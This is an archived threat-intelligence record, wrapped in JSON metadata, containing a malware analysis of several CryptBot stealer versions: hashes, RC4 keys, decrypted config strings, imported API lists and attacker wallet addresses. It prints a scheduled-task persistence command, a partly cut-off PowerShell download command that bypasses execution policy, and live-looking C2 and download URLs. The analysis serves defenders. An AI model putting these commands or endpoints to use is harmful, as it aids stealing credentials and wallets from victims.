{
	"id": "5eb8b5f2-5f58-4a5f-8da0-3c127c63d6a4",
	"created_at": "2026-04-06T00:16:15.336761Z",
	"updated_at": "2026-04-10T13:12:47.26194Z",
	"deleted_at": null,
	"sha1_hash": "a668bb0cc56e6dcf3daa524e054f40b8d3885e8d",
	"title": "CryptBot Evolution",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 126293,
	"plain_text": "CryptBot Evolution\r\nPublished: 2024-12-06 · Archived: 2026-04-05 16:24:23 UTC\r\nOverview\r\nCryptBot has evolved significantly over the past two years. Starting out as a simple stealer compiled with MSVC and containing an XOR-encrypted config, the developers have released multiple iterations of the bot attempting to distance themselves from the original stealer. The modern version is almost unrecognizable: it is compiled with MinGW, makes heavy use of an obfuscator, and uses RC4 to protect its configuration. However, once the layers are stripped away, this is still the same simple stealer underneath.\r\nReferences\r\nThere's Something About CryptBot: Yet Another Silly Stealer (YASS)\r\nVersion 1 (November 2023)\r\nOALABS CryptBot V1 Analysis\r\nConfig encrypted with XOR\r\nMSVC compiled\r\nPacked 7ccda59528c0151bc9f11b7f25f8291d99bcf541488c009ef14e2a104e6f0c5d\r\nUnpacked cfbecf45c083efffff6d3000972a66cddb2f26d5c1845a697351b132e65049e0\r\nPlaintext strings in binary used for C2 comms.\r\nUID:\r\nUserName:\r\nComputerName:\r\nDateTime:\r\nUserAgent:\r\nKeyboard Languages:\r\nDisplay Resolution:\r\nCPU:\r\nRAM:\r\nGPU:\r\nisGodMod: yes\r\nisGodMod: no\r\nisAdmin: yes\r\nisAdmin: no\r\nInstalled software:\r\nConfig\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 1 of 23\n\nExternalDownload: http://ovapfa05.top/unfele.dat\r\nC2: http://erniku42.top/gate.php;\r\nVersion 2 (Timeline unknown)\r\nConfig encrypted with RC4.\r\nMSVC compiled\r\nNot packed 34dcc780d2a2357c52019d87a0720802a92f358d15320247c80cc21060fb6f57\r\nRC4 key oSabnN\r\nAccording to Intezer:\r\nThe stealer also has the ability to drop the NetSupport Client as a backdoor for the infected machine. The client is deployed via a PowerShell command and script.\r\n/c powershell -NoP -NonI -ExecutionPolicy Bypass -Command \"$Resp = Invoke-WebRequest -Uri 'https://b\r\nPlaintext strings in binary used for C2 comms.\r\nUserName (ComputerName):\r\nData (Time):\r\nOS:\r\nKeyboard Languages:\r\nCPU:\r\nRAM:\r\nGPU:\r\nDisplay Resolution:\r\nInstalled Apps:\r\nDecrypted config (ASCII and wide versions of the same table)\r\ngceight8vt.top\r\n\\Winodukec\r\noSabnN\r\n\\ServiceData\r\n\\ServiceData\\Clip.jpg\r\n\\ServiceData\\Clip.exe\r\n/c schtasks /create /tn \\Service\\Data /tr \"\"\"\"%wS\"\"\" \"\"\"%wS\"\"\"\" /st 00:01 /du 9800:59 /sc once /ri 1 /f\r\nGET\r\nPOST\r\n/index.php\r\n/gate.php\r\n/zip.php\r\n/upload.php\r\ncurl/8.0.1\r\nNULL\r\nNULL\r\nNULL\r\nContent-Length: %lu\r\nHTTP\r\nHTTPS\r\n\"encrypted_key\":\"\r\nDPAPI\r\nDISPLAY\r\n$CREEN.JPEG\r\nScreenShot.jpeg\r\nMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; rv:11.0) like Gecko\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36\r\nApps\r\nBrowsers\r\nFiles\r\nWallets\r\nUserID.txt\r\nDebug.txt\r\nEnd.txt\r\nlog.txt\r\nUser's Computer Information.txt\r\nDesktop\r\nOthers\r\nNULL\r\nAn error occurred while starting the application (0xc000007b). To exit the application, click OK.\r\nSystem Error\r\nNULL\r\nComSpec\r\nLocalAppData\r\nAppData\r\nTemp\r\nUserProfile\r\nNULL\r\nNULL\r\nshaverma.site\r\nNULL\r\nkernel32.dll\r\nntdll.dll\r\nuser32.dll\r\nshlwapi.dll\r\nmsvcrt.dll\r\nshell32.dll\r\nwininet.dll\r\nwinhttp.dll\r\nws2_32.dll\r\nurlmon.dll\r\ncrypt32.dll\r\ngdi32.dll\r\ngdiplus.dll\r\nole32.dll\r\ncabinet.dll\r\nadvpack.dll\r\nadvapi32.dll\r\nrstrtmgr.dll\r\nwinsqlite3.dll\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nGetModuleHandleA\r\nGetModuleHandleW\r\nGetModuleHandleExA\r\nGetModuleHandleExW\r\nLoadLibraryA\r\nLoadLibraryW\r\nLoadLibraryExA\r\nLoadLibraryExW\r\nGetProcAddress\r\nFreeLibrary\r\nNULL\r\nMessageBoxA\r\nMessageBoxW\r\nNULL\r\nCreateThread\r\nCreateRemoteThread\r\nCreateRemoteThreadEx\r\nOpenThread\r\nOpenProcess\r\nGetThreadId\r\nGetProcessId\r\nCreateMutexA\r\nCreateMutexW\r\nReleaseMutex\r\nWaitForSingleObject\r\nCreateProcessA\r\nCreateProcessW\r\nShellExecuteA\r\nShellExecuteW\r\nWinExec\r\nNULL\r\nHeapCreate\r\nGetProcessHeap\r\nHeapAlloc\r\nHeapReAlloc\r\nHeapSize\r\nHeapFree\r\nNULL\r\nVirtualAlloc\r\nVirtualAllocEx\r\nVirtualFree\r\nVirtualFreeEx\r\nVirtualProtect\r\nVirtualProtectEx\r\nNULL\r\nLocalAlloc\r\nLocalFree\r\nNULL\r\ncalloc\r\nmalloc\r\nrealloc\r\nfree\r\nNULL\r\nCreateFileA\r\nCreateFileW\r\nReadFile\r\nWriteFile\r\nSetFilePointer\r\nSetFilePointerEx\r\nGetFileAttributesA\r\nGetFileAttributesW\r\nGetFileAttributesExA\r\nGetFileAttributesExW\r\nGetFileSize\r\nGetFileSizeEx\r\nCreateFileMappingA\r\nCreateFileMappingW\r\nMapViewOfFile\r\nUnmapViewOfFile\r\nCloseHandle\r\nNULL\r\nSHGetFolderPathA\r\nSHGetFolderPathW\r\nGetEnvironmentVariableA\r\nGetEnvironmentVariableW\r\nExpandEnvironmentStringsA\r\nExpandEnvironmentStringsW\r\nGetModuleFileNameA\r\nGetModuleFileNameW\r\nGetModuleFileNameExA\r\nGetModuleFileNameExW\r\nGetCurrentDirectoryA\r\nGetCurrentDirectoryW\r\nGetSystemDirectoryA\r\nGetSystemDirectoryW\r\nGetSystemWow64DirectoryA\r\nGetSystemWow64DirectoryW\r\nGetTempPathA\r\nGetTempPathW\r\nGetTempFileNameA\r\nGetTempFileNameW\r\nNULL\r\nURLDownloadToFileA\r\nURLDownloadToFileW\r\nURLOpenBlockingStreamA\r\nURLOpenBlockingStreamW\r\nCoInitialize\r\nCoUninitialize\r\nNULL\r\nWinHttpCrackUrl\r\nWinHttpOpen\r\nWinHttpConnect\r\nWinHttpOpenRequest\r\nWinHttpAddRequestHeaders\r\nWinHttpSendRequest\r\nWinHttpReceiveResponse\r\nWinHttpReadData\r\nWinHttpReadDataEx\r\nWinHttpQueryHeaders\r\nWinHttpQueryOption\r\nWinHttpCloseHandle\r\nNULL\r\nInternetCrackUrlA\r\nInternetOpenUrlA\r\nInternetOpenA\r\nInternetConnectA\r\nHttpOpenRequestA\r\nHttpSendRequestA\r\nHttpQueryInfoA\r\nInternetReadFile\r\nInternetReadFileExA\r\nInternetCloseHandle\r\nNULL\r\nInternetCrackUrlW\r\nInternetOpenUrlW\r\nInternetOpenW\r\nInternetConnectW\r\nHttpOpenRequestW\r\nHttpSendRequestW\r\nHttpQueryInfoW\r\nInternetReadFile\r\nInternetReadFileExW\r\nInternetCloseHandle\r\nNULL\r\nWSAStartup\r\nsocket\r\nhtons\r\ninet_addr\r\nbind\r\nlisten\r\naccept\r\nrecv\r\nrecvfrom\r\nsend\r\nclosesocket\r\nWSAGetLastError\r\nWSACleanup\r\nNULL\r\nFindFirstFileNameA\r\nFindFirstFileNameW\r\nFindNextFileNameA\r\nFindNextFileNameW\r\nFindFirstFileA\r\nFindFirstFileW\r\nFindFirstFileExA\r\nFindFirstFileExW\r\nFindNextFileA\r\nFindNextFileW\r\nFindClose\r\nNULL\r\nRegOpenKeyExA\r\nRegOpenKeyExW\r\nRegQueryInfoKeyA\r\nRegQueryInfoKeyW\r\nRegEnumKeyExA\r\nRegEnumKeyExW\r\nRegQueryValueExA\r\nRegQueryValueExW\r\nRegCloseKey\r\nNULL\r\nwnsprintfA\r\nwnsprintfW\r\nStrStrIA\r\nStrStrIW\r\nPathIsDirectoryA\r\nPathIsDirectoryW\r\nPathFileExistsA\r\nPathFileExistsW\r\nSHAnsiToUnicode\r\nSHUnicodeToAnsi\r\nNULL\r\nwsprintfA\r\nwsprintfW\r\n_snprintf\r\n_snwprintf\r\nswprintf\r\nsprintf\r\n_swprintf\r\nsprintf_s\r\nswprintf_s\r\n_snwprintf_s\r\n_vscprintf\r\nvsnprintf\r\n_vscwprintf\r\nvswprintf\r\nNULL\r\nWideCharToMultiByte\r\nMultiByteToWideChar\r\nGetComputerNameA\r\nGetComputerNameW\r\nGetUserNameA\r\nGetUserNameW\r\nCopyFileA\r\nCopyFileW\r\nCopyFileExA\r\nCopyFileExW\r\nDeleteFileA\r\nDeleteFileW\r\nMoveFileA\r\nMoveFileW\r\nMoveFileExA\r\nMoveFileExW\r\nCreateDirectoryA\r\nCreateDirectoryW\r\nRemoveDirectoryA\r\nRemoveDirectoryW\r\nNULL\r\nEnumDisplaySettingsA\r\nEnumDisplaySettingsW\r\nCreateDCA\r\nCreateDCW\r\nCreateCompatibleDC\r\nCreateCompatibleBitmap\r\nSelectObject\r\nBitBlt\r\nGetDeviceCaps\r\nStretchBlt\r\nGetObjectA\r\nGetObjectW\r\nGetDIBits\r\nReleaseDC\r\nDeleteDC\r\nNULL\r\nGdiplusStartup\r\nGdipGetImageEncoders\r\nGdipGetImageEncodersSize\r\nGdipLoadImageFromFile\r\nGdipCreateBitmapFromHBITMAP\r\nGdipSaveImageToFile\r\nGdipSaveImageToStream\r\nGetBitmapBits\r\nDeleteObject\r\nGdiplusShutdown\r\nNULL\r\nSHCreateMemStream\r\nCreateStreamOnHGlobal\r\nSaveImageToStream\r\nIStream_Size\r\nIStream_Reset\r\nIStream_Read\r\nNULL\r\nExtractFilesA\r\nExtractFilesW\r\nExtract\r\nFCICreate\r\nFCIAddFile\r\nFCIFlushFolder\r\nFCIFlushCabinet\r\nFCIDestroy\r\nNULL\r\nCryptUnprotectData\r\nGetTickCount\r\nGetTickCount64\r\nQueryPerformanceCounter\r\nCreateToolhelp32Snapshot\r\nProcess32FirstA\r\nProcess32FirstW\r\nProcess32NextA\r\nProcess32NextW\r\nGetLocaleInfoA\r\nGetLocaleInfoW\r\nGetLogicalDriveStringsA\r\nGetLogicalDriveStringsW\r\nGetDriveTypeA\r\nGetDriveTypeW\r\nGetVolumeInformationA\r\nGetVolumeInformationW\r\nGetDiskFreeSpaceExA\r\nGetDiskFreeSpaceExW\r\nReadConsoleA\r\nReadConsoleW\r\nWriteConsoleA\r\nWriteConsoleW\r\nGetCommandLineA\r\nGetCommandLineW\r\nGetConsoleMode\r\nprintf\r\nwprintf\r\natoi\r\n_wtoi\r\nFileTimeToSystemTime\r\nGetFileInformationByHandle\r\nIsBadReadPtr\r\nSystemTimeToFileTime\r\nGetTimeZoneInformation\r\nGetLocalTime\r\nGlobalMemoryStatusEx\r\nDuplicateHandle\r\nGetCurrentProcess\r\nGetCurrentThread\r\nGetUserDefaultLocaleName\r\nGetSystemMetrics\r\nGetSystemInfo\r\nGetNativeSystemInfo\r\nIsWow64Process\r\nIsWow64Process2\r\nGetKeyboardLayoutList\r\nRtlGetVersion\r\nGetLastError\r\nSetErrorMode\r\nabs\r\nclock\r\nOpenProcess\r\nTerminateProcess\r\nRmStartSession\r\nRmRegisterResources\r\nRmGetList\r\nRmEndSession\r\nstrtod\r\nisspace\r\nSleep\r\nSleepEx\r\nGetExitCodeThread\r\nExitThread\r\nExitProcess\r\nFileTimeToDosDateTime\r\nWinHttpSetOption\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nVersion 3.1 (Timeline unknown)\r\nConfig encrypted with RC4 (dynamic)\r\nGCC compiled. Linker: GNU linker ld (GNU Binutils)(2.40)GUI32\r\nContains a zipped binary and DLL\r\nff10143803f39c6c08b2fbe846d990b92c6d1b71e27f89bca69ab9331945b14a\r\nRC4 key LkgwUi\r\nContains an embedded clipboard crypto stealer\r\nComplete crypto stealer 059d39e5ea384d50c448696da393e9396b883627e5ad02bdd77b66371ba34f7d\r\nCorrupted crypto stealer 7a5a330e626f73b5c4bfa9aeb29a19429cbdd66dd7968b190586c14cbee8a7c9\r\nCrypto addresses\r\n0xAd32513c4eC05473BD61E6B52eDfd9b6E1Aa5cb8\r\naddr1q8jpzpnwlwu4a6kjyjxgvezzm37u9t84fz959e0fzyxm2s0yzyrxa7aetm4dyfyvsejy9hrac2k02jytgtj7jygdk4qs3eg0ge\r\nbc1qyyuf4jnjl0h0cak8x6jr2j4tg8kdqtvpmuy4ry\r\n17f9LD7vcwLAQCKLndeSw4mHog4TMYiQUR\r\n3KqeRSDxs4TcK9B2DiymiH43ecc7wYwyNW\r\n1XFCPNp73Ri94yuzn1Uw7UuBjc\r\nLZXNaN8NvdGLzCS5CxRRELkam3CPENdJnb\r\nTDkA9uBQPpstFPZEwh4avMdea5Himx2a7T\r\nrsUa6Xs5fiqvp6EHV4urFE8Sk7QHHVwWez\r\nterra1xkkzmqhgzlezxdn2qserytms7ng3zxcw8639yx\r\nKPET9oKko2NGKgzojp7AcAreukPDoNZifHMSDsVjQGt\r\n\"Anal\" build artifacts that dox the build env\r\n/home/anal/bot/zip_include/zip.c\r\n/home/anal/bot/zip_include/miniz.h\r\nC2: http://tventyvx20pn.top/v1/upload.php\r\nPlaintext strings in binary used for C2 comms.\r\nCPU:\r\nRAM:\r\nInstalled Apps:\r\nDisplay Resolution:\r\nGPU:\r\nOS:\r\nUserName (ComputerName):\r\nKeyboard Languages:\r\nData (Time):\r\nDecrypted config strings\r\ntventyvx20pn.top\r\n\\nuSONyiIRP\r\nLkgwUi\r\n\\ServiceData\r\n\\ServiceData\\Clip.au3\r\n\\ServiceData\\Clip.exe\r\n/c schtasks /create /tn \\Service\\Data /tr \"\"\"\"%wS\"\"\" \"\"\"%wS\"\"\"\" /st 00:01 /du 9800:59 /sc once /ri 1 /f\r\nGET\r\nPOST\r\n/index.php\r\n/gate.php\r\n/zip.php\r\n/v1/upload.php\r\ncurl/8.0.1\r\nNULL\r\nNULL\r\nNULL\r\nContent-Length: %lu\r\nHTTP\r\nHTTPS\r\n\"encrypted_key\":\"\r\nDPAPI\r\nDISPLAY\r\n$CREEN.JPEG\r\nScreenShot.jpeg\r\nMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; rv:11.0) like Gecko\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36\r\nApps\r\nBrowsers\r\nFiles\r\nWallets\r\nUserID.txt\r\nDebug.txt\r\nEnd.txt\r\nlog.txt\r\nUser's Computer Information.txt\r\nDesktop\r\nOthers\r\nNULL\r\nAn error occurred while starting the application (0xc000007b). To exit the application, click OK.\r\nSystem Error\r\nNULL\r\nComSpec\r\nLocalAppData\r\nAppData\r\nTemp\r\nUserProfile\r\nNULL\r\nNULL\r\nanalforeverlovyu.top\r\nNULL\r\nkernel32.dll\r\nntdll.dll\r\nuser32.dll\r\nshlwapi.dll\r\nmsvcrt.dll\r\nshell32.dll\r\nwininet.dll\r\nwinhttp.dll\r\nws2_32.dll\r\nurlmon.dll\r\ncrypt32.dll\r\ngdi32.dll\r\ngdiplus.dll\r\nole32.dll\r\ncabinet.dll\r\nadvpack.dll\r\nadvapi32.dll\r\nrstrtmgr.dll\r\nwinsqlite3.dll\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nGetModuleHandleA\r\nGetModuleHandleW\r\nGetModuleHandleExA\r\nGetModuleHandleExW\r\nLoadLibraryA\r\nLoadLibraryW\r\nLoadLibraryExA\r\nLoadLibraryExW\r\nGetProcAddress\r\nFreeLibrary\r\nNULL\r\nMessageBoxA\r\nMessageBoxW\r\nNULL\r\nCreateThread\r\nCreateRemoteThread\r\nCreateRemoteThreadEx\r\nOpenThread\r\nOpenProcess\r\nGetThreadId\r\nGetProcessId\r\nCreateMutexA\r\nCreateMutexW\r\nReleaseMutex\r\nWaitForSingleObject\r\nCreateProcessA\r\nCreateProcessW\r\nShellExecuteA\r\nShellExecuteW\r\nWinExec\r\nNULL\r\nHeapCreate\r\nGetProcessHeap\r\nHeapAlloc\r\nHeapReAlloc\r\nHeapSize\r\nHeapFree\r\nNULL\r\nVirtualAlloc\r\nVirtualAllocEx\r\nVirtualFree\r\nVirtualFreeEx\r\nVirtualProtect\r\nVirtualProtectEx\r\nNULL\r\nLocalAlloc\r\nLocalFree\r\nNULL\r\ncalloc\r\nmalloc\r\nrealloc\r\nfree\r\nNULL\r\nCreateFileA\r\nCreateFileW\r\nReadFile\r\nWriteFile\r\nSetFilePointer\r\nSetFilePointerEx\r\nGetFileAttributesA\r\nGetFileAttributesW\r\nGetFileAttributesExA\r\nGetFileAttributesExW\r\nGetFileSize\r\nGetFileSizeEx\r\nCreateFileMappingA\r\nCreateFileMappingW\r\nMapViewOfFile\r\nUnmapViewOfFile\r\nCloseHandle\r\nNULL\r\nSHGetFolderPathA\r\nSHGetFolderPathW\r\nGetEnvironmentVariableA\r\nGetEnvironmentVariableW\r\nExpandEnvironmentStringsA\r\nExpandEnvironmentStringsW\r\nGetModuleFileNameA\r\nGetModuleFileNameW\r\nGetModuleFileNameExA\r\nGetModuleFileNameExW\r\nGetCurrentDirectoryA\r\nGetCurrentDirectoryW\r\nGetSystemDirectoryA\r\nGetSystemDirectoryW\r\nGetSystemWow64DirectoryA\r\nGetSystemWow64DirectoryW\r\nGetTempPathA\r\nGetTempPathW\r\nGetTempFileNameA\r\nGetTempFileNameW\r\nNULL\r\nURLDownloadToFileA\r\nURLDownloadToFileW\r\nURLOpenBlockingStreamA\r\nURLOpenBlockingStreamW\r\nCoInitialize\r\nCoUninitialize\r\nNULL\r\nWinHttpCrackUrl\r\nWinHttpOpen\r\nWinHttpConnect\r\nWinHttpOpenRequest\r\nWinHttpAddRequestHeaders\r\nWinHttpSendRequest\r\nWinHttpReceiveResponse\r\nWinHttpReadData\r\nWinHttpReadDataEx\r\nWinHttpQueryHeaders\r\nWinHttpQueryOption\r\nWinHttpCloseHandle\r\nNULL\r\nInternetCrackUrlA\r\nInternetOpenUrlA\r\nInternetOpenA\r\nInternetConnectA\r\nHttpOpenRequestA\r\nHttpSendRequestA\r\nHttpQueryInfoA\r\nInternetReadFile\r\nInternetReadFileExA\r\nInternetCloseHandle\r\nNULL\r\nInternetCrackUrlW\r\nInternetOpenUrlW\r\nInternetOpenW\r\nInternetConnectW\r\nHttpOpenRequestW\r\nHttpSendRequestW\r\nHttpQueryInfoW\r\nInternetReadFile\r\nInternetReadFileExW\r\nInternetCloseHandle\r\nNULL\r\nWSAStartup\r\nsocket\r\nhtons\r\ninet_addr\r\nbind\r\nlisten\r\naccept\r\nrecv\r\nrecvfrom\r\nsend\r\nclosesocket\r\nWSAGetLastError\r\nWSACleanup\r\nNULL\r\nFindFirstFileNameA\r\nFindFirstFileNameW\r\nFindNextFileNameA\r\nFindNextFileNameW\r\nFindFirstFileA\r\nFindFirstFileW\r\nFindFirstFileExA\r\nFindFirstFileExW\r\nFindNextFileA\r\nFindNextFileW\r\nFindClose\r\nNULL\r\nRegOpenKeyExA\r\nRegOpenKeyExW\r\nRegQueryInfoKeyA\r\nRegQueryInfoKeyW\r\nRegEnumKeyExA\r\nRegEnumKeyExW\r\nRegQueryValueExA\r\nRegQueryValueExW\r\nRegCloseKey\r\nNULL\r\nwnsprintfA\r\nwnsprintfW\r\nStrStrIA\r\nStrStrIW\r\nPathIsDirectoryA\r\nPathIsDirectoryW\r\nPathFileExistsA\r\nPathFileExistsW\r\nSHAnsiToUnicode\r\nSHUnicodeToAnsi\r\nNULL\r\nwsprintfA\r\nwsprintfW\r\n_snprintf\r\n_snwprintf\r\nswprintf\r\nsprintf\r\n_swprintf\r\nsprintf_s\r\nswprintf_s\r\n_snwprintf_s\r\n_vscprintf\r\nvsnprintf\r\n_vscwprintf\r\nvswprintf\r\nNULL\r\nWideCharToMultiByte\r\nMultiByteToWideChar\r\nGetComputerNameA\r\nGetComputerNameW\r\nGetUserNameA\r\nGetUserNameW\r\nCopyFileA\r\nCopyFileW\r\nCopyFileExA\r\nCopyFileExW\r\nDeleteFileA\r\nDeleteFileW\r\nMoveFileA\r\nMoveFileW\r\nMoveFileExA\r\nMoveFileExW\r\nCreateDirectoryA\r\nCreateDirectoryW\r\nRemoveDirectoryA\r\nRemoveDirectoryW\r\nNULL\r\nEnumDisplaySettingsA\r\nEnumDisplaySettingsW\r\nCreateDCA\r\nCreateDCW\r\nCreateCompatibleDC\r\nCreateCompatibleBitmap\r\nSelectObject\r\nBitBlt\r\nGetDeviceCaps\r\nStretchBlt\r\nGetObjectA\r\nGetObjectW\r\nGetDIBits\r\nReleaseDC\r\nDeleteDC\r\nNULL\r\nGdiplusStartup\r\nGdipGetImageEncoders\r\nGdipGetImageEncodersSize\r\nGdipLoadImageFromFile\r\nGdipCreateBitmapFromHBITMAP\r\nGdipSaveImageToFile\r\nGdipSaveImageToStream\r\nGetBitmapBits\r\nDeleteObject\r\nGdiplusShutdown\r\nNULL\r\nSHCreateMemStream\r\nCreateStreamOnHGlobal\r\nSaveImageToStream\r\nIStream_Size\r\nIStream_Reset\r\nIStream_Read\r\nNULL\r\nExtractFilesA\r\nExtractFilesW\r\nExtract\r\nFCICreate\r\nFCIAddFile\r\nFCIFlushFolder\r\nFCIFlushCabinet\r\nFCIDestroy\r\nNULL\r\nCryptUnprotectData\r\nGetTickCount\r\nGetTickCount64\r\nQueryPerformanceCounter\r\nCreateToolhelp32Snapshot\r\nProcess32FirstA\r\nProcess32FirstW\r\nProcess32NextA\r\nProcess32NextW\r\nGetLocaleInfoA\r\nGetLocaleInfoW\r\nGetLogicalDriveStringsA\r\nGetLogicalDriveStringsW\r\nGetDriveTypeA\r\nGetDriveTypeW\r\nGetVolumeInformationA\r\nGetVolumeInformationW\r\nGetDiskFreeSpaceExA\r\nGetDiskFreeSpaceExW\r\nReadConsoleA\r\nReadConsoleW\r\nWriteConsoleA\r\nWriteConsoleW\r\nGetCommandLineA\r\nGetCommandLineW\r\nGetConsoleMode\r\nprintf\r\nwprintf\r\natoi\r\n_wtoi\r\nFileTimeToSystemTime\r\nGetFileInformationByHandle\r\nIsBadReadPtr\r\nSystemTimeToFileTime\r\nGetTimeZoneInformation\r\nGetLocalTime\r\nGlobalMemoryStatusEx\r\nDuplicateHandle\r\nGetCurrentProcess\r\nGetCurrentThread\r\nGetUserDefaultLocaleName\r\nGetSystemMetrics\r\nGetSystemInfo\r\nGetNativeSystemInfo\r\nIsWow64Process\r\nIsWow64Process2\r\nGetKeyboardLayoutList\r\nRtlGetVersion\r\nGetLastError\r\nSetErrorMode\r\nabs\r\nclock\r\nOpenProcess\r\nTerminateProcess\r\nRmStartSession\r\nRmRegisterResources\r\nRmGetList\r\nRmEndSession\r\nstrtod\r\nisspace\r\nSleep\r\nSleepEx\r\nGetExitCodeThread\r\nExitThread\r\nExitProcess\r\nFileTimeToDosDateTime\r\nWinHttpSetOption\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nVersion 3.2 (Timeline unknown)\r\nGCC compiled\r\nDownloads the binary\r\ne7a83ddae3eec8ce624fc138e1dddb7f3ff5c5c9f20db11f60e22f489bdcc947\r\nSource: https://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)"
	],
	"report_names": [
		"cryptbot2.html#Version-3.2-(Timeline-unknown)"
	],
	"threat_actors": [],
	"ts_created_at": 1775434575,
	"ts_updated_at": 1775826767,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a668bb0cc56e6dcf3daa524e054f40b8d3885e8d.pdf",
		"text": "https://archive.orkl.eu/a668bb0cc56e6dcf3daa524e054f40b8d3885e8d.txt",
		"img": "https://archive.orkl.eu/a668bb0cc56e6dcf3daa524e054f40b8d3885e8d.jpg"
	}
}